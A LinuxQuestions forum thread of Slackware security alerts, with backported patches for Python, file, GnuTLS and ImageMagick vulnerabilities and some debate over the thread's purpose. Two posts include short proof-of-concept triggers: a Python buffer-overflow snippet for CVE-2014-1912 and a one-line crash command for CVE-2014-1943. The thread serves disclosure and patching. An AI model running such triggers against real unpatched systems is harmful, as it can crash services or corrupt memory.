Old 02-12-2014, 05:43 AM   #76
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled

As a die-hard pragmatist, my take on the kernel vulnerability is very simple: root exploit bad; fix easy.

It perplexes me when people focus on excuses; solutions are so much better.

--mancha
 
4 members found this post helpful.
Old 02-12-2014, 11:54 AM   #78
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Update 20140212
  1. Python

    A buffer overflow (CVE-2014-1912) has been identified in Python with a fix planned for inclusion in 2.7.7. However, because
    I don't know how long before that release, I decided to backport upstream's fix to Python 2.7.5 (Slackware 14.1's version)
    and 2.7.6 (most recent 2.7.x release):

    python-2.7.5_CVE-2014-1912.diff (sig)
    python-2.7.6_CVE-2014-1912.diff (sig)

    The fellow who discovered the vulnerability says that while highly unlikely, theoretically it is remotely exploitable.
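PoC
Code:
import socket
r, w = socket.socketpair()
w.send(b'X' * 1024)
# Ask for 1024 bytes into a zero-length bytearray: the requested size
# exceeds the destination buffer, which is the CVE-2014-1912 overflow.
r.recvfrom_into(bytearray(), 1024)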
--mancha

Last edited by mancha; 02-12-2014 at 12:08 PM.
 
6 members found this post helpful.
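A caller-side guard for the recvfrom_into() call pattern in the PoC above, as an added example that is not part of the post or of the upstream patch. The helper name checked_recvfrom_into is hypothetical; it rejects any request larger than the destination buffer before the socket module's C code is reached, and the demo data is constructed.

```python
import socket


def checked_recvfrom_into(sock, buffer, nbytes=0, flags=0):
    """Call sock.recvfrom_into() only when nbytes fits inside buffer.

    Hypothetical helper: the size check happens in Python, so an
    interpreter without the CVE-2014-1912 fix is never asked to write
    past the end of the buffer.
    """
    view = memoryview(buffer)
    if view.readonly:
        raise TypeError("buffer must be writable")
    capacity = len(view) * view.itemsize  # size in bytes (1-D buffers)
    if nbytes < 0:
        raise ValueError("negative buffer size")
    if nbytes == 0:
        nbytes = capacity  # same default the socket module uses
    if nbytes > capacity:
        raise ValueError("nbytes (%d) exceeds buffer size (%d)" % (nbytes, capacity))
    return sock.recvfrom_into(buffer, nbytes, flags)


def demo():
    """Replay the PoC's call pattern on a local socket pair (constructed input)."""
    r, w = socket.socketpair()
    try:
        w.send(b"X" * 1024)
        try:
            checked_recvfrom_into(r, bytearray(), 1024)  # PoC arguments
            rejected = False
        except ValueError:
            rejected = True
        buf = bytearray(1024)  # correctly sized destination
        received, _addr = checked_recvfrom_into(r, buf, 1024)
        return rejected, received, bytes(buf[:received])
    finally:
        r.close()
        w.close()


if __name__ == "__main__":
    print(demo())
```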
Old 02-12-2014, 05:32 PM   #79
ivandi
Member
 
Registered: Jul 2009
Location: Québec, Canada
Distribution: CRUX, Debian
Posts: 528

Rep: Reputation: 866
I am not sure I understand the point of this thread.

Keeping up with all the security issues is actually much more time consuming than maintaining a distribution like Slackware. It's a full time job for a dedicated team. PV provides basic security support for Slackware, keeping an eye out for important flaws and patching them. It's enough for home or small business users. Anyone who has ever used Slackware in a larger production environment knows that he/she is on his/her own.

So what's the point of flashing here all these CVEs?
 
1 members found this post helpful.
Old 02-12-2014, 05:40 PM   #80
jstg
Member
 
Registered: Apr 2006
Distribution: Slackware
Posts: 59

Rep: Reputation: 37
Quote:
Originally Posted by ivandi View Post
I am not sure I understand the point of this thread.

Keeping up with all the security issues is actually much more time consuming than maintaining a distribution like Slackware. It's a full time job for a dedicated team. PV provides basic security support for Slackware, keeping an eye out for important flaws and patching them. It's enough for home or small business users. Anyone who has ever used Slackware in a larger production environment knows that he/she is on his/her own.

So what's the point of flashing here all these CVEs?
I've been looking at it as a way to alert other users of security risks so if they want to take their own action they can. mancha has been pretty good about pointing out the issues and then providing fixes for them. I'm happy mancha is taking the time to help out.
 
5 members found this post helpful.
Old 02-12-2014, 05:44 PM   #81
number22
Member
 
Registered: Sep 2006
Location: Earth
Distribution: Slackware 14.1 Slackware64-current multilib
Posts: 278
Blog Entries: 7

Rep: Reputation: Disabled
There is no need to sugarcoat security flaws and no need to question the OP's method of warning. I find this thread very useful; at least the OP is trying to be organized.
 
7 members found this post helpful.
Old 02-12-2014, 07:22 PM   #82
ivandi
Member
 
Registered: Jul 2009
Location: Québec, Canada
Distribution: CRUX, Debian
Posts: 528

Rep: Reputation: 866
IMHO the Slackware-security mailing list is much more organized and is the right method of reporting security issues and proposing patches.

Actually downloading unofficial "security" patches from forum posts is the worst practice I can imagine.

No offense to the OP but this sounds like an attempt to point out the obvious fact that PV can't keep up with ALL the security issues of Slackware. As I said above it's mission impossible for a single maintainer. Slackware is what it is - a one-man show. There is no point in complaining about the time it takes to fix some vulnerability. Even a root exploit. As a Slackware user you are on your own. Take it or leave it.
 
Old 02-12-2014, 08:02 PM   #83
chessmaster15
LQ Newbie
 
Registered: Aug 2011
Location: Delaware
Distribution: FreeBSD,OpenBSD,Slackware
Posts: 21

Rep: Reputation: Disabled
I found emailing the security team takes care of problems fast. I remember I sent an email a while back about an issue and it was corrected a couple of hours later.
 
Old 02-12-2014, 09:02 PM   #84
metaschima
Senior Member
 
Registered: Dec 2013
Distribution: Slackware
Posts: 1,982

Rep: Reputation: 492
Quote:
Originally Posted by chessmaster15 View Post
I found emailing the security team takes care of problems fast. I remember I sent an email a while back about an issue and it was corrected a couple of hours later.
It would be nice if mancha told us if he actually e-mails these to Pat V. or not.
 
Old 02-13-2014, 11:01 AM   #85
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Quote:
Originally Posted by ivandi View Post
I am not sure I understand the point of this thread...So what's the point of flashing here all these CVEs.
To contribute to Slackware by providing security-related alerts and making fixes for identified vulnerabilities available to Pat and fellow slackers.

In addition, the thread provides a space where slackers can discuss technical aspects of discovered security issues.

--mancha

Last edited by mancha; 02-18-2014 at 02:13 AM. Reason: Made answer direct and to the point.
 
11 members found this post helpful.
Old 02-14-2014, 02:12 AM   #86
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Update 20140214
  1. GnuTLS

    It was discovered version 1 intermediate certificates were being incorrectly considered CA certificates by default since
    version 2.11.5. Systems with CAs in their trusted root certificate store, which issue X.509 version 1 certificates, are
    potentially vulnerable. [CVE-2014-1959 / GNUTLS-SA-2014-1]

    Solution: Upgrade to GnuTLS 3.1.21 or apply this fix.
--mancha

Last edited by mancha; 02-14-2014 at 11:14 PM. Reason: Update version where flaw was introduced.
 
1 members found this post helpful.
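Picking out the certificates this advisory concerns, as an added example that is not GnuTLS code or part of the post: it reads the X.509 version from DER (Python 3) and lists version 1 certificates sitting in an intermediate position, which cannot carry the basicConstraints extension that marks a CA. The function names and the byte-string stubs are constructed for illustration.

```python
def _read_tlv(data, pos):
    """Return (tag, value_start, value_end) of the DER element at pos."""
    if pos + 2 > len(data):
        raise ValueError("truncated DER")
    tag, first = data[pos], data[pos + 1]
    pos += 2
    if first < 0x80:                       # short-form length
        length = first
    else:                                  # long-form length
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(data):
            raise ValueError("unsupported DER length")
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    if pos + length > len(data):
        raise ValueError("truncated DER")
    return tag, pos, pos + length


def x509_version(der):
    """Return 1, 2 or 3 for a DER-encoded certificate."""
    tag, start, _ = _read_tlv(der, 0)      # Certificate
    if tag != 0x30:
        raise ValueError("certificate is not a SEQUENCE")
    tag, start, _ = _read_tlv(der, start)  # tbsCertificate
    if tag != 0x30:
        raise ValueError("tbsCertificate is not a SEQUENCE")
    tag, vstart, _ = _read_tlv(der, start)
    if tag != 0xA0:                        # no [0] field: default is v1
        return 1
    tag, istart, iend = _read_tlv(der, vstart)
    if tag != 0x02 or iend - istart != 1 or der[istart] > 2:
        raise ValueError("malformed version field")
    return der[istart] + 1


def v1_intermediates(chain):
    """Indexes of v1 certificates between the leaf and the trust anchor.

    chain is a list of DER blobs ordered leaf first, trust anchor last.
    """
    return [i for i in range(1, len(chain) - 1) if x509_version(chain[i]) == 1]


# Constructed stubs: only the leading fields of a certificate, enough for
# the version check. They are not complete or valid certificates.
V3_STUB = bytes.fromhex("300a3008a003020102020101")
V1_STUB = bytes.fromhex("30053003020105")
```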
Old 02-18-2014, 02:19 AM   #87
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Update 20140218
  1. file

    A flaw (CVE-2014-1943) was discovered in the handling of indirect magic rules in the libmagic library where malicious
    input can trigger an infinite recursion and cause a DoS (segmentation fault) or, theoretically, arbitrary code execution.

    PoC:
    Code:
    $ echo -n "4552000000" | xxd -r -p | file -
    Solution: Upgrade to file 5.17 or apply my backport fix (sig) to file 5.14.

--mancha

Last edited by mancha; 02-18-2014 at 12:50 PM.
 
Old 02-21-2014, 11:38 AM   #88
altor31
LQ Newbie
 
Registered: May 2010
Distribution: Slackware
Posts: 16

Rep: Reputation: 5
Update 20140221

Quote:
Adobe has released security updates for Adobe Flash Player 12.0.0.44 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.336 and earlier versions for Linux. These updates address vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe is aware of reports that an exploit for CVE-2014-0502 exists in the wild, and recommends users update their product installations to the latest versions:

Users of Adobe Flash Player 11.2.202.336 and earlier versions for Linux should update to Adobe Flash Player 11.2.202.341.

More information on http://helpx.adobe.com/security/prod...apsb14-07.html
I personally use the slackbuilds from SBo and just download the last version of Flash here https://fpdownload.macromedia.com/ge....x86_64.tar.gz

I'm pretty sure that we could do the same with the flashplayer in /extra
 
2 members found this post helpful.
Old 02-21-2014, 06:54 PM   #89
metaschima
Senior Member
 
Registered: Dec 2013
Distribution: Slackware
Posts: 1,982

Rep: Reputation: 492
The kernel vulnerability has been fixed. The new kernel has '# CONFIG_X86_X32 is not set', which is the simplest solution.
 
Old 02-22-2014, 04:44 PM   #90
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled
Update 20140222
  1. ImageMagick

    Two vulnerabilities have been identified in the way ImageMagick handles PSD images: 1) a boundary error during RLE decoding
    (CVE-2014-1958), and 2) a buffer overrun when writing PSD images (CVE-2014-2030).

    Solution: Rebuild ImageMagick 6.8.6-10 after applying my backport fix.

    Note: I combined both fixes into a single patch because they're both in the Photoshop image processing code-base.
--mancha
 
Old 03-04-2014, 04:37 PM   #91
mancha
Member
 
Registered: Aug 2012
Posts: 484

Original Poster
Rep: Reputation: Disabled

Update 20140304
  1. GnuTLS

    A security audit of GnuTLS, carried out by one of its primary developers, has identified serious flaws in its certificate validation
    code (CVE-2014-0092). The vulnerabilities can be exploited via specially-crafted certificates to effectively circumvent certificate
    validation checks.

    Solution: Slackware deployed security fixes for Slackware 13.0 through current the day the issue became public (20140303).
    I encourage those who've not yet applied these updates to do so as soon as possible.

    Note: Slackware 12.1 and 12.2 systems can address this issue by rebuilding GnuTLS after applying Slackware 13.0's fix.
--mancha

Last edited by mancha; 03-04-2014 at 11:26 PM. Reason: add audit attribution
 
1 members found this post helpful.
  

